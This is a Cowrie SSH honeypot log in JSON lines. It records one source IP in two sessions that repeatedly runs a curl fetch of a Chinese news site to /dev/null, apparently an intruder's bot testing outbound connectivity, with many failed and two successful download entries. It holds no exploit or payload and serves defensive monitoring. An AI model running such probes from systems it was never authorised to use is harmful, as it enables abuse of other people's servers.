{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.074628Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.075829Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.178693Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.180537Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.199731Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.201133Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.213166Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.214394Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.224330Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.225728Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.243099Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.244265Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.251547Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.252702Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.261037Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.262416Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.284150Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.285302Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.290525Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.291746Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.304995Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.306405Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.324363Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.325584Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.329243Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.330061Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.364786Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.365959Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.368366Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.369525Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.405423Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.406633Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.409725Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.410636Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.412163Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.414442Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.475209Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.493586Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.560894Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.562596Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.679914Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.681349Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.737304Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.738837Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.742438Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.743920Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.747448Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.748687Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.820573Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.833480Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.834886Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.838229Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.839327Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.840821Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.873203Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.889308Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.920550Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:37.930080Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.931484Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:37.971258Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.020097Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.021214Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.023306Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.085770Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.122950Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.124056Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.183705Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.202988Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.203965Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.283889Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.344163Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.345423Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.354940Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.368427Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.369588Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.409005Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.410427Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.412587Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.418932Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.419804Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.449437Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.450493Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.454815Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.455667Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.487506Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.488561Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.491008Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.491834Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.495418Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.497816Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.547568Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.549110Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.561214Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.562387Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.565535Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.567101Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.584821Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.586329Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.616248Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.617538Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.621922Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.622846Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.661510Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.662625Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.669096Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.670063Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.704793Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.705927Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.726159Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.728231Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.768652Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.769883Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.798938Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.801914Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.837499Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.840683Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.866149Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.867530Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.887315Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.908591Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.910395Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.950191Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.952096Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.994949Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:38.996577Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
